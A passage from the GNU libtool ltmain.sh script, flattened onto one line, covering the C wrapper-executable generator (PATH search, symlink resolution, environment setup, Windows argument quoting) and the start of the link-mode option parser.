\${1+\"\$@\"} fi else # The program doesn't exist. \$ECHO \"\$0: error: '\$progdir/\$program' does not exist\" 1>&2 \$ECHO \"This script is just a wrapper for \$program.\" 1>&2 \$ECHO \"See the $PACKAGE documentation for more information.\" 1>&2 exit 1 fi fi\ " } # func_emit_cwrapperexe_src # emit the source code for a wrapper executable on stdout # Must ONLY be called from within func_mode_link because # it depends on a number of variable set therein. func_emit_cwrapperexe_src () { cat < #include #ifdef _MSC_VER # include # include # include #else # include # include # ifdef __CYGWIN__ # include # endif #endif #include #include #include #include #include #include #include #include #define STREQ(s1, s2) (strcmp ((s1), (s2)) == 0) /* declarations of non-ANSI functions */ #if defined __MINGW32__ # ifdef __STRICT_ANSI__ int _putenv (const char *); # endif #elif defined __CYGWIN__ # ifdef __STRICT_ANSI__ char *realpath (const char *, char *); int putenv (char *); int setenv (const char *, const char *, int); # endif /* #elif defined other_platform || defined ... */ #endif /* portability defines, excluding path handling macros */ #if defined _MSC_VER # define setmode _setmode # define stat _stat # define chmod _chmod # define getcwd _getcwd # define putenv _putenv # define S_IXUSR _S_IEXEC #elif defined __MINGW32__ # define setmode _setmode # define stat _stat # define chmod _chmod # define getcwd _getcwd # define putenv _putenv #elif defined __CYGWIN__ # define HAVE_SETENV # define FOPEN_WB "wb" /* #elif defined other platforms ... */ #endif #if defined PATH_MAX # define LT_PATHMAX PATH_MAX #elif defined MAXPATHLEN # define LT_PATHMAX MAXPATHLEN #else # define LT_PATHMAX 1024 #endif #ifndef S_IXOTH # define S_IXOTH 0 #endif #ifndef S_IXGRP # define S_IXGRP 0 #endif /* path handling portability macros */ #ifndef DIR_SEPARATOR # define DIR_SEPARATOR '/' # define PATH_SEPARATOR ':' #endif #if defined _WIN32 || defined __MSDOS__ || defined __DJGPP__ || \ defined __OS2__ # define HAVE_DOS_BASED_FILE_SYSTEM # define FOPEN_WB "wb" # ifndef DIR_SEPARATOR_2 # define DIR_SEPARATOR_2 '\\' # endif # ifndef PATH_SEPARATOR_2 # define PATH_SEPARATOR_2 ';' # endif #endif #ifndef DIR_SEPARATOR_2 # define IS_DIR_SEPARATOR(ch) ((ch) == DIR_SEPARATOR) #else /* DIR_SEPARATOR_2 */ # define IS_DIR_SEPARATOR(ch) \ (((ch) == DIR_SEPARATOR) || ((ch) == DIR_SEPARATOR_2)) #endif /* DIR_SEPARATOR_2 */ #ifndef PATH_SEPARATOR_2 # define IS_PATH_SEPARATOR(ch) ((ch) == PATH_SEPARATOR) #else /* PATH_SEPARATOR_2 */ # define IS_PATH_SEPARATOR(ch) ((ch) == PATH_SEPARATOR_2) #endif /* PATH_SEPARATOR_2 */ #ifndef FOPEN_WB # define FOPEN_WB "w" #endif #ifndef _O_BINARY # define _O_BINARY 0 #endif #define XMALLOC(type, num) ((type *) xmalloc ((num) * sizeof(type))) #define XFREE(stale) do { \ if (stale) { free (stale); stale = 0; } \ } while (0) #if defined LT_DEBUGWRAPPER static int lt_debug = 1; #else static int lt_debug = 0; #endif const char *program_name = "libtool-wrapper"; /* in case xstrdup fails */ void *xmalloc (size_t num); char *xstrdup (const char *string); const char *base_name (const char *name); char *find_executable (const char *wrapper); char *chase_symlinks (const char *pathspec); int make_executable (const char *path); int check_executable (const char *path); char *strendzap (char *str, const char *pat); void lt_debugprintf (const char *file, int line, const char *fmt, ...); void lt_fatal (const char *file, int line, const char *message, ...); static const char *nonnull (const char *s); static const char *nonempty (const char *s); void lt_setenv (const char *name, const char *value); char *lt_extend_str (const char *orig_value, const char *add, int to_end); void lt_update_exe_path (const char *name, const char *value); void lt_update_lib_path (const char *name, const char *value); char **prepare_spawn (char **argv); void lt_dump_script (FILE *f); EOF cat <= 0) && (st.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH))) return 1; else return 0; } int make_executable (const char *path) { int rval = 0; struct stat st; lt_debugprintf (__FILE__, __LINE__, "(make_executable): %s\n", nonempty (path)); if ((!path) || (!*path)) return 0; if (stat (path, &st) >= 0) { rval = chmod (path, st.st_mode | S_IXOTH | S_IXGRP | S_IXUSR); } return rval; } /* Searches for the full path of the wrapper. Returns newly allocated full path name if found, NULL otherwise Does not chase symlinks, even on platforms that support them. */ char * find_executable (const char *wrapper) { int has_slash = 0; const char *p; const char *p_next; /* static buffer for getcwd */ char tmp[LT_PATHMAX + 1]; size_t tmp_len; char *concat_name; lt_debugprintf (__FILE__, __LINE__, "(find_executable): %s\n", nonempty (wrapper)); if ((wrapper == NULL) || (*wrapper == '\0')) return NULL; /* Absolute path? */ #if defined HAVE_DOS_BASED_FILE_SYSTEM if (isalpha ((unsigned char) wrapper[0]) && wrapper[1] == ':') { concat_name = xstrdup (wrapper); if (check_executable (concat_name)) return concat_name; XFREE (concat_name); } else { #endif if (IS_DIR_SEPARATOR (wrapper[0])) { concat_name = xstrdup (wrapper); if (check_executable (concat_name)) return concat_name; XFREE (concat_name); } #if defined HAVE_DOS_BASED_FILE_SYSTEM } #endif for (p = wrapper; *p; p++) if (*p == '/') { has_slash = 1; break; } if (!has_slash) { /* no slashes; search PATH */ const char *path = getenv ("PATH"); if (path != NULL) { for (p = path; *p; p = p_next) { const char *q; size_t p_len; for (q = p; *q; q++) if (IS_PATH_SEPARATOR (*q)) break; p_len = (size_t) (q - p); p_next = (*q == '\0' ? q : q + 1); if (p_len == 0) { /* empty path: current directory */ if (getcwd (tmp, LT_PATHMAX) == NULL) lt_fatal (__FILE__, __LINE__, "getcwd failed: %s", nonnull (strerror (errno))); tmp_len = strlen (tmp); concat_name = XMALLOC (char, tmp_len + 1 + strlen (wrapper) + 1); memcpy (concat_name, tmp, tmp_len); concat_name[tmp_len] = '/'; strcpy (concat_name + tmp_len + 1, wrapper); } else { concat_name = XMALLOC (char, p_len + 1 + strlen (wrapper) + 1); memcpy (concat_name, p, p_len); concat_name[p_len] = '/'; strcpy (concat_name + p_len + 1, wrapper); } if (check_executable (concat_name)) return concat_name; XFREE (concat_name); } } /* not found in PATH; assume curdir */ } /* Relative path | not found in path: prepend cwd */ if (getcwd (tmp, LT_PATHMAX) == NULL) lt_fatal (__FILE__, __LINE__, "getcwd failed: %s", nonnull (strerror (errno))); tmp_len = strlen (tmp); concat_name = XMALLOC (char, tmp_len + 1 + strlen (wrapper) + 1); memcpy (concat_name, tmp, tmp_len); concat_name[tmp_len] = '/'; strcpy (concat_name + tmp_len + 1, wrapper); if (check_executable (concat_name)) return concat_name; XFREE (concat_name); return NULL; } char * chase_symlinks (const char *pathspec) { #ifndef S_ISLNK return xstrdup (pathspec); #else char buf[LT_PATHMAX]; struct stat s; char *tmp_pathspec = xstrdup (pathspec); char *p; int has_symlinks = 0; while (strlen (tmp_pathspec) && !has_symlinks) { lt_debugprintf (__FILE__, __LINE__, "checking path component for symlinks: %s\n", tmp_pathspec); if (lstat (tmp_pathspec, &s) == 0) { if (S_ISLNK (s.st_mode) != 0) { has_symlinks = 1; break; } /* search backwards for last DIR_SEPARATOR */ p = tmp_pathspec + strlen (tmp_pathspec) - 1; while ((p > tmp_pathspec) && (!IS_DIR_SEPARATOR (*p))) p--; if ((p == tmp_pathspec) && (!IS_DIR_SEPARATOR (*p))) { /* no more DIR_SEPARATORS left */ break; } *p = '\0'; } else { lt_fatal (__FILE__, __LINE__, "error accessing file \"%s\": %s", tmp_pathspec, nonnull (strerror (errno))); } } XFREE (tmp_pathspec); if (!has_symlinks) { return xstrdup (pathspec); } tmp_pathspec = realpath (pathspec, buf); if (tmp_pathspec == 0) { lt_fatal (__FILE__, __LINE__, "could not follow symlinks for %s", pathspec); } return xstrdup (tmp_pathspec); #endif } char * strendzap (char *str, const char *pat) { size_t len, patlen; assert (str != NULL); assert (pat != NULL); len = strlen (str); patlen = strlen (pat); if (patlen <= len) { str += len - patlen; if (STREQ (str, pat)) *str = '\0'; } return str; } void lt_debugprintf (const char *file, int line, const char *fmt, ...) { va_list args; if (lt_debug) { (void) fprintf (stderr, "%s:%s:%d: ", program_name, file, line); va_start (args, fmt); (void) vfprintf (stderr, fmt, args); va_end (args); } } static void lt_error_core (int exit_status, const char *file, int line, const char *mode, const char *message, va_list ap) { fprintf (stderr, "%s:%s:%d: %s: ", program_name, file, line, mode); vfprintf (stderr, message, ap); fprintf (stderr, ".\n"); if (exit_status >= 0) exit (exit_status); } void lt_fatal (const char *file, int line, const char *message, ...) { va_list ap; va_start (ap, message); lt_error_core (EXIT_FAILURE, file, line, "FATAL", message, ap); va_end (ap); } static const char * nonnull (const char *s) { return s ? s : "(null)"; } static const char * nonempty (const char *s) { return (s && !*s) ? "(empty)" : nonnull (s); } void lt_setenv (const char *name, const char *value) { lt_debugprintf (__FILE__, __LINE__, "(lt_setenv) setting '%s' to '%s'\n", nonnull (name), nonnull (value)); { #ifdef HAVE_SETENV /* always make a copy, for consistency with !HAVE_SETENV */ char *str = xstrdup (value); setenv (name, str, 1); #else size_t len = strlen (name) + 1 + strlen (value) + 1; char *str = XMALLOC (char, len); sprintf (str, "%s=%s", name, value); if (putenv (str) != EXIT_SUCCESS) { XFREE (str); } #endif } } char * lt_extend_str (const char *orig_value, const char *add, int to_end) { char *new_value; if (orig_value && *orig_value) { size_t orig_value_len = strlen (orig_value); size_t add_len = strlen (add); new_value = XMALLOC (char, add_len + orig_value_len + 1); if (to_end) { strcpy (new_value, orig_value); strcpy (new_value + orig_value_len, add); } else { strcpy (new_value, add); strcpy (new_value + add_len, orig_value); } } else { new_value = xstrdup (add); } return new_value; } void lt_update_exe_path (const char *name, const char *value) { lt_debugprintf (__FILE__, __LINE__, "(lt_update_exe_path) modifying '%s' by prepending '%s'\n", nonnull (name), nonnull (value)); if (name && *name && value && *value) { char *new_value = lt_extend_str (getenv (name), value, 0); /* some systems can't cope with a ':'-terminated path #' */ size_t len = strlen (new_value); while ((len > 0) && IS_PATH_SEPARATOR (new_value[len-1])) { new_value[--len] = '\0'; } lt_setenv (name, new_value); XFREE (new_value); } } void lt_update_lib_path (const char *name, const char *value) { lt_debugprintf (__FILE__, __LINE__, "(lt_update_lib_path) modifying '%s' by prepending '%s'\n", nonnull (name), nonnull (value)); if (name && *name && value && *value) { char *new_value = lt_extend_str (getenv (name), value, 0); lt_setenv (name, new_value); XFREE (new_value); } } EOF case $host_os in mingw*) cat <<"EOF" /* Prepares an argument vector before calling spawn(). Note that spawn() does not by itself call the command interpreter (getenv ("COMSPEC") != NULL ? getenv ("COMSPEC") : ({ OSVERSIONINFO v; v.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&v); v.dwPlatformId == VER_PLATFORM_WIN32_NT; }) ? "cmd.exe" : "command.com"). Instead it simply concatenates the arguments, separated by ' ', and calls CreateProcess(). We must quote the arguments since Win32 CreateProcess() interprets characters like ' ', '\t', '\\', '"' (but not '<' and '>') in a special way: - Space and tab are interpreted as delimiters. They are not treated as delimiters if they are surrounded by double quotes: "...". - Unescaped double quotes are removed from the input. Their only effect is that within double quotes, space and tab are treated like normal characters. - Backslashes not followed by double quotes are not special. - But 2*n+1 backslashes followed by a double quote become n backslashes followed by a double quote (n >= 0): \" -> " \\\" -> \" \\\\\" -> \\" */ #define SHELL_SPECIAL_CHARS "\"\\ \001\002\003\004\005\006\007\010\011\012\013\014\015\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037" #define SHELL_SPACE_CHARS " \001\002\003\004\005\006\007\010\011\012\013\014\015\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037" char ** prepare_spawn (char **argv) { size_t argc; char **new_argv; size_t i; /* Count number of arguments. */ for (argc = 0; argv[argc] != NULL; argc++) ; /* Allocate new argument vector. */ new_argv = XMALLOC (char *, argc + 1); /* Put quoted arguments into the new argument vector. */ for (i = 0; i < argc; i++) { const char *string = argv[i]; if (string[0] == '\0') new_argv[i] = xstrdup ("\"\""); else if (strpbrk (string, SHELL_SPECIAL_CHARS) != NULL) { int quote_around = (strpbrk (string, SHELL_SPACE_CHARS) != NULL); size_t length; unsigned int backslashes; const char *s; char *quoted_string; char *p; length = 0; backslashes = 0; if (quote_around) length++; for (s = string; *s != '\0'; s++) { char c = *s; if (c == '"') length += backslashes + 1; length++; if (c == '\\') backslashes++; else backslashes = 0; } if (quote_around) length += backslashes + 1; quoted_string = XMALLOC (char, length + 1); p = quoted_string; backslashes = 0; if (quote_around) *p++ = '"'; for (s = string; *s != '\0'; s++) { char c = *s; if (c == '"') { unsigned int j; for (j = backslashes + 1; j > 0; j--) *p++ = '\\'; } *p++ = c; if (c == '\\') backslashes++; else backslashes = 0; } if (quote_around) { unsigned int j; for (j = backslashes; j > 0; j--) *p++ = '\\'; *p++ = '"'; } *p = '\0'; new_argv[i] = quoted_string; } else new_argv[i] = (char *) string; } new_argv[argc] = NULL; return new_argv; } EOF ;; esac cat <<"EOF" void lt_dump_script (FILE* f) { EOF func_emit_wrapper yes | $SED -n -e ' s/^\(.\{79\}\)\(..*\)/\1\ \2/ h s/\([\\"]\)/\\\1/g s/$/\\n/ s/\([^\n]*\).*/ fputs ("\1", f);/p g D' cat <<"EOF" } EOF } # end: func_emit_cwrapperexe_src # func_win32_import_lib_p ARG # True if ARG is an import lib, as indicated by $file_magic_cmd func_win32_import_lib_p () { $debug_cmd case `eval $file_magic_cmd \"\$1\" 2>/dev/null | $SED -e 10q` in *import*) : ;; *) false ;; esac } # func_suncc_cstd_abi # !!ONLY CALL THIS FOR SUN CC AFTER $compile_command IS FULLY EXPANDED!! # Several compiler flags select an ABI that is incompatible with the # Cstd library. Avoid specifying it if any are in CXXFLAGS. func_suncc_cstd_abi () { $debug_cmd case " $compile_command " in *" -compat=g "*|*\ -std=c++[0-9][0-9]\ *|*" -library=stdcxx4 "*|*" -library=stlport4 "*) suncc_use_cstd_abi=no ;; *) suncc_use_cstd_abi=yes ;; esac } # func_mode_link arg... func_mode_link () { $debug_cmd case $host in *-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-cegcc*) # It is impossible to link a dll without this setting, and # we shouldn't force the makefile maintainer to figure out # what system we are compiling for in order to pass an extra # flag for every libtool invocation. # allow_undefined=no # FIXME: Unfortunately, there are problems with the above when trying # to make a dll that has undefined symbols, in which case not # even a static library is built. For now, we need to specify # -no-undefined on the libtool link line when we can be certain # that all symbols are satisfied, otherwise we get a static library. allow_undefined=yes ;; *) allow_undefined=yes ;; esac libtool_args=$nonopt base_compile="$nonopt $@" compile_command=$nonopt finalize_command=$nonopt compile_rpath= finalize_rpath= compile_shlibpath= finalize_shlibpath= convenience= old_convenience= deplibs= old_deplibs= compiler_flags= linker_flags= dllsearchpath= lib_search_path=`pwd` inst_prefix_dir= new_inherited_linker_flags= avoid_version=no bindir= dlfiles= dlprefiles= dlself=no export_dynamic=no export_symbols= export_symbols_regex= generated= libobjs= ltlibs= module=no no_install=no objs= os2dllname= non_pic_objects= precious_files_regex= prefer_static_libs=no preload=false prev= prevarg= release= rpath= xrpath= perm_rpath= temp_rpath= thread_safe=no vinfo= vinfo_number=no weak_libs= single_module=$wl-single_module func_infer_tag $base_compile # We need to know -static, to get the right output filenames. for arg do case $arg in -shared) test yes != "$build_libtool_libs" \ && func_fatal_configuration "cannot build a shared library" build_old_libs=no break ;; -all-static | -static | -static-libtool-libs) case $arg in -all-static) if test yes = "$build_libtool_libs" && test -z "$link_static_flag"; then func_warning "complete static linking is impossible in this configuration" fi if test -n "$link_static_flag"; then dlopen_self=$dlopen_self_static fi prefer_static_libs=yes ;; -static) if test -z "$pic_flag" && test -n "$link_static_flag"; then dlopen_self=$dlopen_self_static fi prefer_static_libs=built ;; -static-libtool-libs) if test -z "$pic_flag" && test -n "$link_static_flag"; then dlopen_self=$dlopen_self_static fi prefer_static_libs=yes ;; esac build_libtool_libs=no build_old_libs=yes break ;; esac done # See if our shared archives depend on static archives. test -n "$old_archive_from_new_cmds" && build_old_libs=yes # Go through the arguments, transforming them on the way. while test "$#" -gt 0; do arg=$1 shift func_quote_arg pretty,unquoted "$arg" qarg=$func_quote_arg_unquoted_result func_append libtool_args " $func_quote_arg_result" # If the previous option needs an argument, assign it. if test -n "$prev"; then case $prev in output) func_append compile_command " @OUTPUT@" func_append finalize_command " @OUTPUT@" ;; esac case $prev in bindir) bindir=$arg prev= continue ;; dlfiles|dlprefiles) $preload || { # Add the symbol object into the linking commands. func_append compile_command " @SYMFILE@" func_append finalize_command " @SYMFILE@" preload=: } case $arg in *.la | *.lo) ;; # We handle these cases below. force) if test no = "$dlself"; then dlself=needless export_dynamic=yes fi prev= continue ;; self) if test dlprefiles = "$prev"; then dlself=yes elif test dlfiles = "$prev" && test yes != "$dlopen_self"; then dlself=yes else dlself=needless export_dynamic=yes fi prev= continue ;; *) if test dlfiles = "$prev"; then func_append dlfiles " $arg" else func_append dlprefiles " $arg" fi prev= continue ;; esac ;; expsyms) export_symbols=$arg test -f "$arg" \ || func_fatal_error "symbol file '$arg' does not exist" prev= continue ;; expsyms_regex) export_symbols_regex=$arg prev= continue ;; framework) case $host in *-*-darwin*) case "$deplibs " in *" $qarg.ltframework "*) ;; *) func_append deplibs " $qarg.ltframework" # this is fixed later ;; esac ;; esac prev= continue ;; inst_prefix) inst_prefix_dir=$arg prev= continue ;; mllvm) # Clang does not use LLVM to link, so we can simply discard any # '-mllvm $arg' options when doing the link step. prev= continue ;; objectlist) if test -f "$arg"; then save_arg=$arg moreargs= for fil in `cat "$save_arg"` do # func_append moreargs " $fil" arg=$fil # A libtool-controlled object. # Check to see that this really is a libtool object. if func_lalib_unsafe_p "$arg"; then pic_object= non_pic_object= # Read the .lo file func_source "$arg" if test -z "$pic_object" || test -z "$non_pic_object" || test none = "$pic_object" && test none = "$non_pic_object"; then func_fatal_error "cannot find name of object for '$arg'" fi # Extract subdirectory from the argument. func_dirname "$arg" "/" "" xdir=$func_dirname_result if test none != "$pic_object"; then # Prepend the subdirectory the object is found in. pic_object=$xdir$pic_object if test dlfiles = "$prev"; then if test yes = "$build_libtool_libs" && test yes = "$dlopen_support"; then func_append dlfiles " $pic_object" prev= continue else # If libtool objects are unsupported, then we need to preload. prev=dlprefiles fi fi # CHECK ME: I think I busted this. -Ossama if test dlprefiles = "$prev"; then # Preload the old-style object. func_append dlprefiles " $pic_object" prev= fi # A PIC object. func_append libobjs " $pic_object" arg=$pic_object fi # Non-PIC object. if test none != "$non_pic_object"; then # Prepend the subdirectory the object is found in. non_pic_object=$xdir$non_pic_object # A standard non-PIC object func_append non_pic_objects " $non_pic_object" if test -z "$pic_object" || test none = "$pic_object"; then arg=$non_pic_object fi else # If the PIC object exists, use it instead. # $xdir was prepended to $pic_object above. non_pic_object=$pic_object func_append non_pic_objects " $non_pic_object" fi else # Only an error if not doing a dry-run. if $opt_dry_run; then # Extract subdirectory from the argument. func_dirname "$arg" "/" "" xdir=$func_dirname_result func_lo2o "$arg" pic_object=$xdir$objdir/$func_lo2o_result non_pic_object=$xdir$func_lo2o_result func_append libobjs " $pic_object" func_append non_pic_objects " $non_pic_object" else func_fatal_error "'$arg' is not a valid libtool object" fi fi done else func_fatal_error "link input file '$arg' does not exist" fi arg=$save_arg prev= continue ;; os2dllname) os2dllname=$arg prev= continue ;; precious_regex) precious_files_regex=$arg prev= continue ;; release) release=-$arg prev= continue ;; rpath | xrpath) # We need an absolute path. case $arg in [\\/]* | [A-Za-z]:[\\/]*) ;; *) func_fatal_error "only absolute run-paths are allowed" ;; esac if test rpath = "$prev"; then case "$rpath " in *" $arg "*) ;; *) func_append rpath " $arg" ;; esac else case "$xrpath " in *" $arg "*) ;; *) func_append xrpath " $arg" ;; esac fi prev= continue ;; shrext) shrext_cmds=$arg prev= continue ;; weak) func_append weak_libs " $arg" prev= continue ;; xcclinker) func_append linker_flags " $qarg" func_append compiler_flags " $qarg" prev= func_append compile_command " $qarg" func_append finalize_command " $qarg" continue ;; xcompiler) func_append compiler_flags " $qarg" prev= func_append compile_command " $qarg" func_append finalize_command " $qarg" continue ;; xlinker) func_append linker_flags " $qarg" func_append compiler_flags " $wl$qarg" prev= func_append compile_command " $wl$qarg" func_append finalize_command " $wl$qarg" continue ;; *) eval "$prev=\"\$arg\"" prev= continue ;; esac fi # test -n "$prev" prevarg=$arg case $arg in -all-static) if test -n "$link_static_flag"; then # See comment for -static flag below, for more details. func_append compile_command " $link_static_flag" func_append finalize_command " $link_static_flag" fi continue ;; -allow-undefined) # FIXME: remove this flag sometime in the future. func_fatal_error "'-allow-undefined' must not be used because it is the default" ;; -avoid-version) avoid_version=yes continue ;; -bindir) prev=bindir continue ;; -dlopen) prev=dlfiles continue ;; -dlpreopen) prev=dlprefiles continue ;; -export-dynamic) export_dynamic=yes continue ;; -export-symbols | -export-symbols-regex) if test -n "$export_symbols" || test -n "$export_symbols_regex"; then func_fatal_error "more than one -exported-symbols argument is not allowed" fi if test X-export-symbols = "X$arg"; then prev=expsyms else prev=expsyms_regex fi continue ;; -framework) prev=framework continue ;; -inst-prefix-dir) prev=inst_prefix continue ;; # The native IRIX linker understands -LANG:*, -LIST:* and -LNO:* # so, if we see these flags be careful not to treat them like -L -L[A-Z][A-Z]*:*) case $with_gcc/$host in no/*-*-irix* | /*-*-irix*) func_append compile_command " $arg" func_append finalize_command " $arg" ;; esac continue ;; -L*) func_stripname "-L" '' "$arg" if test -z "$func_stripname_result"; then if test "$#" -gt 0; then func_fatal_error "require no space between '-L' and '$1'" else func_fatal_error "need path for '-L' option" fi fi func_resolve_sysroot "$func_stripname_result" dir=$func_resolve_sysroot_result # We need an absolute path. case $dir in [\\/]* | [A-Za-z]:[\\/]*) ;; *) absdir=`cd "$dir" && pwd` test -z "$absdir" && \ func_fatal_error "cannot determine absolute directory name of '$dir'" dir=$absdir ;; esac case "$deplibs " in *" -L$dir "* | *" $arg "*) # Will only happen for absolute or sysroot arguments ;; *) # Preserve sysroot, but never include relative directories case $dir in [\\/]* | [A-Za-z]:[\\/]* | =*) func_append deplibs " $arg" ;; *) func_append deplibs " -L$dir" ;; esac func_append lib_search_path " $dir" ;; esac case $host in *-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-cegcc*) testbindir=`$ECHO "$dir" | $SED 's*/lib$*/bin*'` case :$dllsearchpath: in *":$dir:"*) ;; ::) dllsearchpath=$dir;; *) func_append dllsearchpath ":$dir";; esac case :$dllsearchpath: in *":$testbindir:"*) ;; ::) dllsearchpath=$testbindir;; *) func_append dllsearchpath ":$testbindir";; esac ;; esac continue ;; -l*) if test X-lc = "X$arg" || test X-lm = "X$arg"; then case $host in *-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-beos* | *-cegcc* | *-*-haiku*) # These systems don't actually have a C or math library (as such) continue ;; *-*-os2*) # These systems don't actually have a C library (as such) test X-lc = "X$arg" && continue ;; *-*-openbsd* | *-*-freebsd* | *-*-dragonfly* | *-*-bitrig*) # Do not include libc due to us having libc/libc_r. test X-lc = "X$arg" && continue ;; *-*-rhapsody* | *-*-darwin1.[012]) # Rhapsody C and math libraries are in the System framework func_append deplibs " System.ltframework" continue ;; *-*-sco3.2v5* | *-*-sco5v6*) # Causes problems with __ctype test X-lc = "X$arg" && continue ;; *-*-sysv4.2uw2* | *-*-sysv5* | *-*-unixware* | *-*-OpenUNIX*) # Compiler inserts libc in the correct place for threads to work test X-lc = "X$arg" && continue ;; esac elif test X-lc_r = "X$arg"; then case $host in *-*-openbsd* | *-*-freebsd* | *-*-dragonfly* | *-*-bitrig*) # Do not include libc_r directly, use -pthread flag. continue ;; esac fi func_append deplibs " $arg" continue ;; -mllvm) prev=mllvm continue ;; -module) module=yes continue ;; # Tru64 UNIX uses -model [arg] to determine the layout of C++ # classes, name mangling, and exception handling. # Darwin uses the -arch flag to determine output architecture. -model|-arch|-isysroot|--sysroot) func_append compiler_flags " $arg" func_append compile_command " $arg" func_append finalize_command " $arg" prev=xcompiler continue ;; -mt|-mthreads|-kthread|-Kthread|-pthread|-pthreads|--thread-safe \ |-threads|-fopenmp|-openmp|-mp|-xopenmp|-omp|-qsmp=*) func_append compiler_flags " $arg" func_append compile_command " $arg" func_append finalize_command " $arg" case "$new_inherited_linker_flags " in *" $arg "*) ;; * ) func_append new_inherited_linker_flags " $arg" ;; esac continue ;; -multi_module) single_module=$wl-multi_module continue ;; -no-fast-install) fast_install=no continue ;; -no-install) case $host in *-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-*-darwin* | *-cegcc*) # The PATH hackery in wrapper scripts is required on Windows # and Darwin in order for the loader to find any dlls it needs. func_warning "'-no-install' is ignored for $host" func_warning "assuming '-no-fast-install' instead" fast_install=no ;; *) no_install=yes ;; esac continue ;; -no-undefined) allow_undefined=no continue ;; -objectlist) prev=objectlist continue ;; -os2dllname) prev=os2dllname continue ;; -o) prev=output ;; -precious-files-regex) prev=precious_regex continue ;; -release) prev=release continue ;; -rpath) prev=rpath continue ;; -R) prev=xrpath continue ;; -R*) func_stripname '-R' '' "$arg" dir=$func_stripname_result # We need an absolute path. case $dir in [\\/]* | [A-Za-z]:[\\/]*) ;; =*) func_stripname '=' '' "$dir" dir=$lt_sysroot$func_stripname_result ;; *) func_fatal_error "only absolute run-paths are allowed" ;; esac case "$xrpath " in *" $dir "*) ;; *) func_append xrpath " $dir" ;; esac continue ;; -shared) # The effects of -shared are defined in a previous loop. continue ;; -shrext) prev=shrext continue ;; -static | -static-libtool-libs) # The effects of -static are defined in a previous loop. # We used to do the same as -all-static on platforms that # didn't have a PIC flag, but the assumption that the effects # would be equivalent was wrong. It would break on at least # Digital Unix and AIX. continue ;; -thread-safe) thread_safe=yes continue ;; -version-info) prev=vinfo continue ;; -version-number) prev=vinfo vinfo_number=yes continue ;; -weak) prev=weak continue ;; -Wc,*) func_stripname '-Wc,' '' "$arg" args=$func_stripname_result arg= save_ifs=$IFS; IFS=, for flag in $args; do IFS=$save_ifs func_quote_arg pretty "$flag" func_append arg " $func_quote_arg_result" func_append compiler_flags " $func_quote_arg_result" done IFS=$save_ifs func_stripname ' ' '' "$arg" arg=$func_stripname_result ;; -Wl,*) func_stripname '-Wl,' '' "$arg" args=$func_stripname_result arg= save_ifs=$IFS; IFS=, for flag in $args; do IFS=$save_ifs func_quote_arg pretty "$flag" func_append arg " $wl$func_quote_arg_result" func_append compiler_flags " $wl$func_quote_arg_result" func_append linker_flags " $func_quote_arg_result" done IFS=$save_ifs func_stripname ' ' '' "$arg" arg=$func_stripname_result ;; -Xcompiler) prev=xcompiler continue ;; -Xlinker) prev=xlinker continue ;; -XCClinker) prev=xcclinker continue ;; # -msg_* for osf cc -msg_*) func_quote_arg pretty "$arg" arg=$func_quote_arg_result ;; # Flags to be passed through unchanged, with rationale: # -64, -mips[0-9] enable 64-bit mode for the SGI compiler # -r[0-9][0-9]* specify processor for the SGI compiler # -xarch=*, -xtarget=* enable 64-bit mode for the Sun compiler # +DA*, +DD* enable 64-bit mode for the HP compiler # -q* compiler args for the IBM compiler # -m*, -t[45]*, -txscale* architecture-specific flags for GCC # -F/path path to uninstalled frameworks, gcc on darwin # -p, -pg, --coverage, -fprofile-* profiling flags for GCC # -fstack-protector* stack protector flags for GCC # @file GCC response files # -tp=* Portland pgcc target processor selection # --sysroot=* for sysroot support # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization # -specs=* GCC specs files # -stdlib=* select c++ std lib with clang # -fsanitize=* Clang/GCC memory and address sanitizer # -fuse-ld=* Linker select flags for GCC -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \ -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*| \ -specs=*|-fsanitize=*|-fuse-ld=*) func_quote_arg pretty "$arg" arg=$func_quote_arg_result func_append compile_command " $arg" func_append finalize_command " $arg" func_append compiler_flags " $arg" continue ;; -Z*) if test os2 = "`expr $host : '.*\(os2\)'`"; then # OS/2 uses -Zxxx to specify OS/2-specific options compiler_flags="$compiler_flags $arg" func_append compile_command " $arg" func_append finalize_command " $arg" case $arg in -Zlinker | -Zstack) prev=xcompiler ;; esac continue else # Otherwise treat like 'Some other compiler flag' below func_quote_arg pretty "$arg" arg=$func_quote_arg_result fi ;; # Some other compiler flag. -* | +*) func_quote_arg pretty "$arg" arg=$func_quote_arg_result ;; *.$objext) # A standard object. func_append objs " $arg" ;; *.lo) # A libtool-controlled object. # Check to see that this really is a libtool object. if func_lalib_unsafe_p "$arg"; then pic_object= non_pic_object= # Read the .lo file func_source "$arg" if test -z "$pic_object" || test -z "$non_pic_object" || test none = "$pic_object" && test none = "$non_pic_object"; then func_fatal_error "cannot find name of object for '$arg'" fi # Extract subdirectory from the argument. func_dirname "$arg" "/" "" xdir=$func_dirname_result test none = "$pic_object" || { # Prepend the subdirectory the object is found in. pic_object=$xdir$pic_object if test dlfiles = "$prev"; then if test yes = "$build_libtool_libs" && test yes = "$dlopen_support"; then func_append dlfiles " $pic_object" prev= continue else # If libtool objects are unsupported, then we need to preload. prev=dlprefiles fi fi # CHECK ME: I think I busted this. -Ossama if test dlprefiles = "$prev"; then # Preload the old-style object. func_append dlprefiles " $pic_object" prev= fi # A PIC object. func_append libobjs " $pic_object" arg=$pic_object } # Non-PIC object. if test none != "$non_pic_object"; then # Prepend the subdirectory the object is found in. non_pic_object=$xdir$non_pic_object # A standard non-PIC object func_append non_pic_objects " $non_pic_object" if test -z "$pic_object" || test none = "$pic_object"; then arg=$non_pic_object fi else # If the PIC object exists, use it instead. # $xdir was prepended to $pic_object above. non_pic_object=$pic_object func_append non_pic_objects " $non_pic_object" fi else # Only an error if not doing a dry-run. if $opt_dry_run; then # Extract 